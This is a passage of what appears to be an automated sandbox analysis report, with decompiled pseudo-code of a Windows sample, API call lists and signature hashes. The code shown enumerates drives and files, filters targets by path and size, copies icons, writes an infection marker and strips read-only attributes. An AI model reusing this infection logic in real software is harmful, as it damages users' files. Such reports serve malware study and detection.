                                                                                                                          							E0040254C(_t68, _t51, _t60);
                                                                                                                          						}
                                                                                                                          						_t30 = FindNextFileA(_t62, _t68); // executed
                                                                                                                          					} while (_t30 != 0);
                                                                                                                          					FindClose(_t62); // executed
                                                                                                                          				}
                                                                                                                          				 *((intOrPtr*)(_t41 + 0x20)) = 0;
                                                                                                                          				return E00404520( *((intOrPtr*)(_t41 + 0x20)));
                                                                                                                          			}
















                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(00000000,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA,00000000,0040758B), ref: 004056D5
                                                                                                                          • FindNextFileA.KERNEL32(00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000,004074FA), ref: 00405737
                                                                                                                          • FindClose.KERNEL32(00000000,00000000,?,00408220,?,00000000,00000000,00408220,00000000,00000000,004052D1,00000000,?,00000000,00000001,00000000), ref: 00405741
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                                                                          • Instruction ID: f2b03bfa0ad8d059d80b67f6c6517dce38b4ab09ecbfd790616c6b691a452e24
                                                                                                                          • Opcode Fuzzy Hash: 7e704a9b868fdf1e88b7c0ef0153828458dabf46e2b7cce886aa46cd4968a9f2
                                                                                                                          • Instruction Fuzzy Hash: 0E1181B53005006BD605BB269D8296B3759DBC5328B10843FBA04EB2C7DA3DCC029A99
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 67%
                                                                                                                          			E00406D40(void* __eax, void* __ebx, void* __edi, void* __esi, char _a12245929) {
                                                                                                                          				char _v155;
                                                                                                                          				char _v160;
                                                                                                                          				signed int _t37;
                                                                                                                          				intOrPtr _t41;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t50;
                                                                                                                          				void* _t51;
                                                                                                                          
                                                                                                                          				_t50 = _t51;
                                                                                                                          				_v160 = 0;
                                                                                                                          				_t45 = __eax;
                                                                                                                          				_push(_t50);
                                                                                                                          				_push(0x406dfc);
                                                                                                                          				_push( *[fs:eax]);
                                                                                                                          				 *[fs:eax] = _t51 + 0xffffff64;
                                                                                                                          				GetLogicalDriveStringsA(0x97,  &_v155); // executed
                                                                                                                          				_t37 = 0;
                                                                                                                          				while(_a12245929 != 0) {
                                                                                                                          					_t48 = _t37 & 0x000000ff;
                                                                                                                          					if(GetDriveTypeA(_t50 + (_t37 & 0x000000ff) - 0x97) != 5 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x41 && E0040258C( *((intOrPtr*)(_t50 + _t48 - 0x97))) != 0x42) {
                                                                                                                          						E004031B4();
                                                                                                                          						E00403214(_t45, _v160);
                                                                                                                          					}
                                                                                                                          					_t37 = _t37 + 4;
                                                                                                                          				}
                                                                                                                          				_pop(_t41);
                                                                                                                          				 *[fs:eax] = _t41;
                                                                                                                          				_push(E00406E03);
                                                                                                                          				return E00403094( &_v160);
                                                                                                                          			}











                                                                                                                          APIs
                                                                                                                          • GetLogicalDriveStringsA.KERNEL32 ref: 00406D70
                                                                                                                          • GetDriveTypeA.KERNEL32(00000000), ref: 00406D89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Drive$LogicalStringsType
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1630765265-0
                                                                                                                          • Opcode ID: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction ID: e1e1b0806745e30ff5eb453561950d2c3ef676df74625b4c39c06a75345551cd
                                                                                                                          • Opcode Fuzzy Hash: e173af02ca9d9f3ac33bd7cae86aa4c8f38faec1d5ba2bccd9283cb2c0ba3d05
                                                                                                                          • Instruction Fuzzy Hash: 301159725181089EE720BE759C52BAA7FADDF45304F4644F7AA0DB32C3D9384D128A28
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404F6C(CHAR* __eax) {
                                                                                                                          				intOrPtr _v288;
                                                                                                                          				void* _t3;
                                                                                                                          				void* _t4;
                                                                                                                          				struct _WIN32_FIND_DATAA* _t8;
                                                                                                                          
                                                                                                                          				_t3 = FindFirstFileA(__eax, _t8); // executed
                                                                                                                          				_t4 = _t3 + 1;
                                                                                                                          				if(_t4 != 0) {
                                                                                                                          					FindClose(_t4 - 1); // executed
                                                                                                                          					return _v288;
                                                                                                                          				}
                                                                                                                          				return _t4;
                                                                                                                          			}








                                                                                                                          APIs
                                                                                                                          • FindFirstFileA.KERNEL32(?,?,0040818B,00000000,00408220), ref: 00404F74
                                                                                                                          • FindClose.KERNEL32(00000000,?,?,0040818B,00000000,00408220), ref: 00404F7E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirst
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2295610775-0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 78%
                                                                                                                          			E00406638(void** __eax, intOrPtr __ecx, unsigned int __edx) {
                                                                                                                          				intOrPtr _v8;
                                                                                                                          				intOrPtr _v12;
                                                                                                                          				short _v14;
                                                                                                                          				char _v17;
                                                                                                                          				signed int _v18;
                                                                                                                          				char _v19;
                                                                                                                          				int _v20;
                                                                                                                          				void** _v24;
                                                                                                                          				unsigned int _v28;
                                                                                                                          				intOrPtr _v32;
                                                                                                                          				char _v33;
                                                                                                                          				int _v40;
                                                                                                                          				intOrPtr _v44;
                                                                                                                          				void* _v48;
                                                                                                                          				intOrPtr _v52;
                                                                                                                          				intOrPtr _v56;
                                                                                                                          				signed short _v58;
                                                                                                                          				short _v60;
                                                                                                                          				short _v62;
                                                                                                                          				intOrPtr _v68;
                                                                                                                          				void* _v72;
                                                                                                                          				void** _v76;
                                                                                                                          				void** _v80;
                                                                                                                          				intOrPtr _v100;
                                                                                                                          				signed short _v106;
                                                                                                                          				short _v108;
                                                                                                                          				int _v112;
                                                                                                                          				int _v116;
                                                                                                                          				char _v120;
                                                                                                                          				short _v126;
                                                                                                                          				intOrPtr _v128;
                                                                                                                          				int _v136;
                                                                                                                          				int _v140;
                                                                                                                          				void _v144;
                                                                                                                          				void* __ebp;
                                                                                                                          				signed int _t138;
                                                                                                                          				signed int _t139;
                                                                                                                          				void* _t141;
                                                                                                                          				unsigned int _t152;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t162;
                                                                                                                          				void* _t179;
                                                                                                                          				void* _t181;
                                                                                                                          				void* _t199;
                                                                                                                          				void* _t201;
                                                                                                                          				void* _t207;
                                                                                                                          				void* _t212;
                                                                                                                          				void* _t214;
                                                                                                                          				signed int _t220;
                                                                                                                          				void* _t221;
                                                                                                                          				void* _t229;
                                                                                                                          				void* _t232;
                                                                                                                          				void* _t243;
                                                                                                                          				void* _t255;
                                                                                                                          				intOrPtr _t264;
                                                                                                                          				void* _t274;
                                                                                                                          				void* _t275;
                                                                                                                          				int _t293;
                                                                                                                          				int _t294;
                                                                                                                          				intOrPtr _t318;
                                                                                                                          				void* _t324;
                                                                                                                          				void* _t366;
                                                                                                                          				void* _t369;
                                                                                                                          				int _t375;
                                                                                                                          				int _t376;
                                                                                                                          				void* _t378;
                                                                                                                          				void* _t380;
                                                                                                                          				intOrPtr _t381;
                                                                                                                          
                                                                                                                          				_t378 = _t380;
                                                                                                                          				_t381 = _t380 + 0xffffff74;
                                                                                                                          				_v32 = __ecx;
                                                                                                                          				_v28 = __edx;
                                                                                                                          				_v24 = __eax;
                                                                                                                          				_v33 = 0;
                                                                                                                          				_v62 = 0;
                                                                                                                          				_v60 = 1;
                                                                                                                          				_t138 = _v28 + 1;
                                                                                                                          				_t139 = _t138 >> 1;
                                                                                                                          				if(_t138 < 0) {
                                                                                                                          					asm("adc eax, 0x0");
                                                                                                                          				}
                                                                                                                          				_v58 = _t139;
                                                                                                                          				_t141 = E0040598C(_v32);
                                                                                                                          				_t384 = _t141 - 6;
                                                                                                                          				if(_t141 != 6) {
                                                                                                                          					L59:
                                                                                                                          					return _v33;
                                                                                                                          				} else {
                                                                                                                          					_v44 = ((_v58 & 0x0000ffff) << 4) + 6;
                                                                                                                          					_v68 = E0040456C();
                                                                                                                          					_v52 = E00405FD8(0, 0, _t384);
                                                                                                                          					_v56 = E00405FD8(0, 0, _t384);
                                                                                                                          					_push(_t378);
                                                                                                                          					_push(0x406b11);
                                                                                                                          					_push( *[fs:ecx]);
                                                                                                                          					 *[fs:ecx] = _t381;
                                                                                                                          					_t152 = _v28 >> 1;
                                                                                                                          					if(_t152 < 0) {
                                                                                                                          						L22:
                                                                                                                          						_t154 = _v28 >> 1;
                                                                                                                          						__eflags = _t154;
                                                                                                                          						if(_t154 < 0) {
                                                                                                                          							L57:
                                                                                                                          							__eflags = 0;
                                                                                                                          							_pop(_t318);
                                                                                                                          							 *[fs:eax] = _t318;
                                                                                                                          							_push(E00406B18);
                                                                                                                          							E00404520(_v68);
                                                                                                                          							E00404520(_v52);
                                                                                                                          							return E00404520(_v56);
                                                                                                                          						} else {
                                                                                                                          							_t162 = _t154 + 1;
                                                                                                                          							__eflags = _t162;
                                                                                                                          							_v72 = _t162;
                                                                                                                          							_v40 = 0;
                                                                                                                          							_v80 = _v24;
                                                                                                                          							do {
                                                                                                                          								_t366 =  *_v80;
                                                                                                                          								_v48 = _v80[1];
                                                                                                                          								__eflags = _t366;
                                                                                                                          								if(_t366 != 0) {
                                                                                                                          									L26:
                                                                                                                          									GetObjectA(_v48, 0x18,  &_v144);
                                                                                                                          									_t293 = _v140;
                                                                                                                          									_t375 = _v136;
                                                                                                                          									E00402660( &_v120, 0x28);
                                                                                                                          									_v120 = 0x28;
                                                                                                                          									_v116 = _t293;
                                                                                                                          									_v112 = _t375;
                                                                                                                          									__eflags = _t366;
                                                                                                                          									if(_t366 != 0) {
                                                                                                                          										_t243 = _t293 + _t293;
                                                                                                                          										__eflags = _t243;
                                                                                                                          										_v112 = _t243;
                                                                                                                          									}
                                                                                                                          									_v108 = 1;
                                                                                                                          									_v18 = E0040465C(_v68, _v40);
                                                                                                                          									__eflags = _v14;
                                                                                                                          									if(_v14 == 0) {
                                                                                                                          										_v14 = E00406580(_v18 & 0x0000ffff);
                                                                                                                          									}
                                                                                                                          									_v106 = _v14;
                                                                                                                          									_push(E004065CC(_t293, _t375, _t378) + 0x28);
                                                                                                                          									_t179 = E00406624(_t293, _t375);
                                                                                                                          									_pop(_t324);
                                                                                                                          									_v100 = _t324 + _t179;
                                                                                                                          									_t181 = E0040598C(_v32);
                                                                                                                          									__eflags = _t181 - 0x28;
                                                                                                                          									if(_t181 == 0x28) {
                                                                                                                          										__eflags = _t366;
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											E004061E0(_v52, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                                                                          										} else {
                                                                                                                          											E004061E0(_v52, CopyImage(_t366, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											_t220 = _v106 & 0x0000ffff;
                                                                                                                          											__eflags = _t220 - 0x10;
                                                                                                                          											if(__eflags > 0) {
                                                                                                                          												_t221 = _t220 - 0x18;
                                                                                                                          												__eflags = _t221;
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													E00406218(_v52, 0x28, 6, _t378, __eflags);
                                                                                                                          												} else {
                                                                                                                          													__eflags = _t221 - 8;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														E00406218(_v52, 0x28, 7, _t378, __eflags);
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													E00406218(_v52, 0x28, 5, _t378, __eflags);
                                                                                                                          												} else {
                                                                                                                          													_t229 = _t220 - 1;
                                                                                                                          													__eflags = _t229;
                                                                                                                          													if(__eflags == 0) {
                                                                                                                          														E00406218(_v52, 0x28, 1, _t378, __eflags);
                                                                                                                          													} else {
                                                                                                                          														_t232 = _t229 - 3;
                                                                                                                          														__eflags = _t232;
                                                                                                                          														if(__eflags == 0) {
                                                                                                                          															E00406218(_v52, 0x28, 2, _t378, __eflags);
                                                                                                                          														} else {
                                                                                                                          															__eflags = _t232 - 4;
                                                                                                                          															if(__eflags == 0) {
                                                                                                                          																E00406218(_v52, 0x28, 3, _t378, __eflags);
                                                                                                                          															}
                                                                                                                          														}
                                                                                                                          													}
                                                                                                                          												}
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          										__eflags =  *(_v52 + 0x41);
                                                                                                                          										if(__eflags == 0) {
                                                                                                                          											L54:
                                                                                                                          											E004061E0(_v56, CopyImage(_v48, 0, _t293, _t375, 0), __eflags);
                                                                                                                          											E00406218(_v56, 0x28, 1, _t378, __eflags);
                                                                                                                          											E00406624(_t293, _t375);
                                                                                                                          											_t199 = E0040598C(_v32);
                                                                                                                          											_t201 = E00406624(_t293, _t375);
                                                                                                                          											__eflags = _t199 - _t201;
                                                                                                                          											if(_t199 == _t201) {
                                                                                                                          												goto L56;
                                                                                                                          											} else {
                                                                                                                          												E00402BEC();
                                                                                                                          												goto L59;
                                                                                                                          											}
                                                                                                                          										} else {
                                                                                                                          											_t207 = E0040598C(_v32);
                                                                                                                          											__eflags = _t207 - (_v18 & 0x0000ffff) << 2;
                                                                                                                          											if(_t207 == (_v18 & 0x0000ffff) << 2) {
                                                                                                                          												E004065CC(_t293, _t375, _t378);
                                                                                                                          												_t212 = E0040598C(_v32);
                                                                                                                          												_t214 = E004065CC(_t293, _t375, _t378);
                                                                                                                          												_pop(0x28);
                                                                                                                          												__eflags = _t212 - _t214;
                                                                                                                          												if(__eflags == 0) {
                                                                                                                          													goto L54;
                                                                                                                          												} else {
                                                                                                                          													E00402BEC();
                                                                                                                          													goto L59;
                                                                                                                          												}
                                                                                                                          											} else {
                                                                                                                          												E00402BEC();
                                                                                                                          												goto L59;
                                                                                                                          											}
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										E00402BEC();
                                                                                                                          										goto L59;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _v48;
                                                                                                                          									if(_v48 == 0) {
                                                                                                                          										goto L57;
                                                                                                                          									} else {
                                                                                                                          										goto L26;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								goto L60;
                                                                                                                          								L56:
                                                                                                                          								_v40 = _v40 + 1;
                                                                                                                          								_v80 =  &(_v80[2]);
                                                                                                                          								_t130 =  &_v72;
                                                                                                                          								 *_t130 = _v72 - 1;
                                                                                                                          								__eflags =  *_t130;
                                                                                                                          							} while ( *_t130 != 0);
                                                                                                                          							goto L57;
                                                                                                                          						}
                                                                                                                          					} else {
                                                                                                                          						_v72 = _t152 + 1;
                                                                                                                          						_v76 = _v24;
                                                                                                                          						while(1) {
                                                                                                                          							_t369 =  *_v76;
                                                                                                                          							_v48 = _v76[1];
                                                                                                                          							if(_t369 == 0 && _v48 == 0) {
                                                                                                                          								goto L22;
                                                                                                                          							}
                                                                                                                          							GetObjectA(_v48, 0x18,  &_v144);
                                                                                                                          							_t294 = _v140;
                                                                                                                          							_t376 = _v136;
                                                                                                                          							if(_t369 != 0) {
                                                                                                                          								GetObjectA(_t369, 0x18,  &_v144);
                                                                                                                          							}
                                                                                                                          							E00402660( &_v20, 0x10);
                                                                                                                          							_v20 = _t294;
                                                                                                                          							_v19 = _t376;
                                                                                                                          							if(_t369 != 0) {
                                                                                                                          								_t255 = CopyImage(_t369, 0, _t294, _t376, 0x2000); // executed
                                                                                                                          								E004061E0(_v52, _t255, __eflags);
                                                                                                                          								E00402660( &_v120, 0x28);
                                                                                                                          								_v120 = 0x28;
                                                                                                                          								GetObjectA(E00406154(_v52, __eflags), 0x18,  &_v144);
                                                                                                                          								_t264 = _v128;
                                                                                                                          								__eflags = _t264 - 1;
                                                                                                                          								if(_t264 != 1) {
                                                                                                                          									L14:
                                                                                                                          									_t310 = _v126;
                                                                                                                          									__eflags = 1 - 0x10;
                                                                                                                          									if(1 >= 0x10) {
                                                                                                                          										__eflags = 1 - 0x100;
                                                                                                                          										if(1 >= 0x100) {
                                                                                                                          											E00406218(_v52, _t310, 3, _t378, 1 - 0x100);
                                                                                                                          											_v18 = 0;
                                                                                                                          											_v17 = 1;
                                                                                                                          										} else {
                                                                                                                          											E00406218(_v52, _t310, 2, _t378, 1 - 0x100);
                                                                                                                          											_v18 = 0x10;
                                                                                                                          										}
                                                                                                                          									} else {
                                                                                                                          										E00406218(_v52, _t310, 1, _t378, 1 - 0x10);
                                                                                                                          										_v18 = 2;
                                                                                                                          									}
                                                                                                                          								} else {
                                                                                                                          									__eflags = _v126 - 0xf;
                                                                                                                          									if(_v126 < 0xf) {
                                                                                                                          										goto L14;
                                                                                                                          									} else {
                                                                                                                          										_v18 = 0;
                                                                                                                          										_v17 = 0;
                                                                                                                          										_v14 = _v126;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								_v18 = 2;
                                                                                                                          							}
                                                                                                                          							E004045E8(_v68, 0xbadbad);
                                                                                                                          							_t274 = E004065CC(_t294, _t376, _t378);
                                                                                                                          							_t275 = E00406598(_t378);
                                                                                                                          							_v12 = _t274 + _t275 + 0x28 + E00406624(_t294, _t376);
                                                                                                                          							_v8 = _v44;
                                                                                                                          							if(E0040598C(_v32) == 0x10) {
                                                                                                                          								_v44 = _v44 + _v12;
                                                                                                                          								_v76 =  &(_v76[2]);
                                                                                                                          								_t66 =  &_v72;
                                                                                                                          								 *_t66 = _v72 - 1;
                                                                                                                          								__eflags =  *_t66;
                                                                                                                          								if( *_t66 != 0) {
                                                                                                                          									continue;
                                                                                                                          								} else {
                                                                                                                          									goto L22;
                                                                                                                          								}
                                                                                                                          							} else {
                                                                                                                          								E00402BEC();
                                                                                                                          								goto L59;
                                                                                                                          							}
                                                                                                                          							goto L60;
                                                                                                                          						}
                                                                                                                          						goto L22;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          				L60:
                                                                                                                          			}

                                                                                                                          0x00406997
                                                                                                                          0x00406992
                                                                                                                          0x0040698f
                                                                                                                          0x0040698d
                                                                                                                          0x00406a1a
                                                                                                                          0x00406a1e
                                                                                                                          0x00406a89
                                                                                                                          0x00406a9d
                                                                                                                          0x00406aa7
                                                                                                                          0x00406ab0
                                                                                                                          0x00406ac0
                                                                                                                          0x00406acb
                                                                                                                          0x00406ad0
                                                                                                                          0x00406ad2
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406ad4
                                                                                                                          0x00000000
                                                                                                                          0x00406ad4
                                                                                                                          0x00406a20
                                                                                                                          0x00406a37
                                                                                                                          0x00406a45
                                                                                                                          0x00406a47
                                                                                                                          0x00406a58
                                                                                                                          0x00406a69
                                                                                                                          0x00406a75
                                                                                                                          0x00406a7a
                                                                                                                          0x00406a7b
                                                                                                                          0x00406a7d
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a7f
                                                                                                                          0x00000000
                                                                                                                          0x00406a7f
                                                                                                                          0x00406a49
                                                                                                                          0x00406a49
                                                                                                                          0x00000000
                                                                                                                          0x00406a49
                                                                                                                          0x00406a47
                                                                                                                          0x0040695e
                                                                                                                          0x0040695e
                                                                                                                          0x00000000
                                                                                                                          0x0040695e
                                                                                                                          0x004068a7
                                                                                                                          0x004068a7
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x004068ab
                                                                                                                          0x00000000
                                                                                                                          0x00406adb
                                                                                                                          0x00406adb
                                                                                                                          0x00406ade
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00406ae2
                                                                                                                          0x00000000
                                                                                                                          0x00406895
                                                                                                                          0x004066cd
                                                                                                                          0x004066ce
                                                                                                                          0x004066d4
                                                                                                                          0x004066d7
                                                                                                                          0x004066da
                                                                                                                          0x004066e2
                                                                                                                          0x004066e7
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406700
                                                                                                                          0x00406705
                                                                                                                          0x0040670b
                                                                                                                          0x00406713
                                                                                                                          0x0040671f
                                                                                                                          0x0040671f
                                                                                                                          0x0040672e
                                                                                                                          0x00406733
                                                                                                                          0x00406738
                                                                                                                          0x0040673d
                                                                                                                          0x00406752
                                                                                                                          0x0040675c
                                                                                                                          0x0040676b
                                                                                                                          0x00406770
                                                                                                                          0x00406789
                                                                                                                          0x0040678e
                                                                                                                          0x00406792
                                                                                                                          0x00406796
                                                                                                                          0x004067b1
                                                                                                                          0x004067b1
                                                                                                                          0x004067c2
                                                                                                                          0x004067c5
                                                                                                                          0x004067d7
                                                                                                                          0x004067dd
                                                                                                                          0x004067f4
                                                                                                                          0x004067f9
                                                                                                                          0x004067fd
                                                                                                                          0x004067df
                                                                                                                          0x004067e4
                                                                                                                          0x004067e9
                                                                                                                          0x004067e9
                                                                                                                          0x004067c7
                                                                                                                          0x004067cc
                                                                                                                          0x004067d1
                                                                                                                          0x004067d1
                                                                                                                          0x00406798
                                                                                                                          0x00406798
                                                                                                                          0x0040679d
                                                                                                                          0x00000000
                                                                                                                          0x0040679f
                                                                                                                          0x0040679f
                                                                                                                          0x004067a3
                                                                                                                          0x004067ab
                                                                                                                          0x004067ab
                                                                                                                          0x0040679d
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x0040673f
                                                                                                                          0x00406813
                                                                                                                          0x0040681d
                                                                                                                          0x00406826
                                                                                                                          0x0040683c
                                                                                                                          0x00406842
                                                                                                                          0x00406858
                                                                                                                          0x00406867
                                                                                                                          0x0040686a
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x0040686e
                                                                                                                          0x00406871
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x0040685a
                                                                                                                          0x00000000
                                                                                                                          0x00406858
                                                                                                                          0x00000000
                                                                                                                          0x004066d7
                                                                                                                          0x004066c7
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 00406700
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 0040671F
                                                                                                                          • GetObjectA.GDI32(00000000,00000018,?), ref: 00406789
                                                                                                                          • GetObjectA.GDI32(?,00000018,?), ref: 004068BE
                                                                                                                          • CopyImage.USER32 ref: 00406977
                                                                                                                          • CopyImage.USER32 ref: 004069FE
                                                                                                                          • CopyImage.USER32 ref: 00406752
                                                                                                                            • Part of subcall function 004061E0: GetObjectA.GDI32(00000000,00000018), ref: 004061F2
                                                                                                                            • Part of subcall function 00406154: 73BBAC50.USER32(00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000,00000000,00000000), ref: 00406177
                                                                                                                            • Part of subcall function 00406154: 73BBA7A0.GDI32(00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000,?,00000000), ref: 00406192
                                                                                                                            • Part of subcall function 00406154: 73BBB380.USER32(00000000,00000000,00000000,?,00000000,00000041,00000000,00000000,00000000,?,?,00000000,004063DF,00000000,?,00000000), ref: 0040619D
                                                                                                                          • CopyImage.USER32 ref: 00406A93
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.582234125.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000001.00000002.582156425.0000000000400000.00000002.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582330780.0000000000409000.00000004.00020000.sdmp
                                                                                                                          • Associated: 00000001.00000002.582460538.0000000000418000.00000002.00020000.sdmp
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Object$CopyImage$B380
                                                                                                                          • String ID: (
                                                                                                                          • API String ID: 1117845954-3887548279
                                                                                                                          • Opcode ID: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction ID: 8b23a46e2d3205504fa6020bfc4f244d26e515b74d7163ba5290a0ebff7405a2
                                                                                                                          • Opcode Fuzzy Hash: d876f8923c35b832f472c7a332169e1393348db5e915f3cd377978d8d2a1e04c
                                                                                                                          • Instruction Fuzzy Hash: 37E16170A002189BDB10EBA9D885AAEB7F5AF49304F11807BF405FB3C1DA3D9D55CB69
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
                                                                                                                          				char _v8;
                                                                                                                          				char _v9;
                                                                                                                          				char _v16;
                                                                                                                          				char _v40254;
                                                                                                                          				char _v41487;
                                                                                                                          				char _v41488;
                                                                                                                          				char _v41492;
                                                                                                                          				char _v41496;
                                                                                                                          				char _v41500;
                                                                                                                          				char _v41504;
                                                                                                                          				void* _t45;
                                                                                                                          				void* _t80;
                                                                                                                          				void* _t82;
                                                                                                                          				long _t85;
                                                                                                                          				CHAR* _t130;
                                                                                                                          				intOrPtr _t150;
                                                                                                                          				void* _t154;
                                                                                                                          				void* _t155;
                                                                                                                          				long _t173;
                                                                                                                          				void* _t177;
                                                                                                                          				void* _t178;
                                                                                                                          
                                                                                                                          				_t128 = __ebx;
                                                                                                                          				_t177 = _t178;
                                                                                                                          				_push(__eax);
                                                                                                                          				_t45 = 0xa;
                                                                                                                          				goto L1;
                                                                                                                          				L17:
                                                                                                                          				_pop(_t150);
                                                                                                                          				 *[fs:eax] = _t150;
                                                                                                                          				_push(E00407493);
                                                                                                                          				E004030B8( &_v41504, 4);
                                                                                                                          				return E00403094( &_v8);
                                                                                                                          				L1:
                                                                                                                          				_t178 = _t178 + 0xfffff004;
                                                                                                                          				_push(_t45);
                                                                                                                          				_t45 = _t45 - 1;
                                                                                                                          				_t180 = _t45;
                                                                                                                          				if(_t45 != 0) {
                                                                                                                          					goto L1;
                                                                                                                          				} else {
                                                                                                                          					_push(__ebx);
                                                                                                                          					_v41504 = 0;
                                                                                                                          					_v41500 = 0;
                                                                                                                          					_v41496 = 0;
                                                                                                                          					_v41492 = 0;
                                                                                                                          					E004033FC(_v8);
                                                                                                                          					_push(_t177);
                                                                                                                          					_push(0x40748c);
                                                                                                                          					_push( *[fs:eax]);
                                                                                                                          					 *[fs:eax] = _t178 + 0xfffffde8;
                                                                                                                          					_v9 = 0;
                                                                                                                          					E004031F4( &_v41492, 3, 0x4091c0);
                                                                                                                          					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
                                                                                                                          						E00404F34(_v8,  &_v41496);
                                                                                                                          						E0040312C( &_v8, _v41496);
                                                                                                                          						E00404F90( &_v41500, _t128, 3);
                                                                                                                          						_push(E0040340C(_v41500));
                                                                                                                          						_t129 = E0040340C(_v8);
                                                                                                                          						_pop(_t154);
                                                                                                                          						if(E00404B38(_t68, _t154) == 0) {
                                                                                                                          							E00405008( &_v41504, _t129, 3);
                                                                                                                          							_t155 = E0040340C(_v41504);
                                                                                                                          							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
                                                                                                                          								_t80 = E00404F6C(_v8);
                                                                                                                          								if(_t80 > 0xa200 && _t80 <= 0x989680) {
                                                                                                                          									_t82 = E00407130(_v8, _t129); // executed
                                                                                                                          									if(_t82 == 0) {
                                                                                                                          										_v9 = 1;
                                                                                                                          										_t130 = E0040340C(_v8);
                                                                                                                          										_t85 = GetFileAttributesA(_t130); // executed
                                                                                                                          										_t173 = _t85;
                                                                                                                          										if((_t173 & 0x00000001) > 0) {
                                                                                                                          											SetFileAttributesA(_t130, 0);
                                                                                                                          										}
                                                                                                                          										_t131 = E00405BDC();
                                                                                                                          										_t175 = E004064CC();
                                                                                                                          										E00406CA8(_t87, 0, _v8);
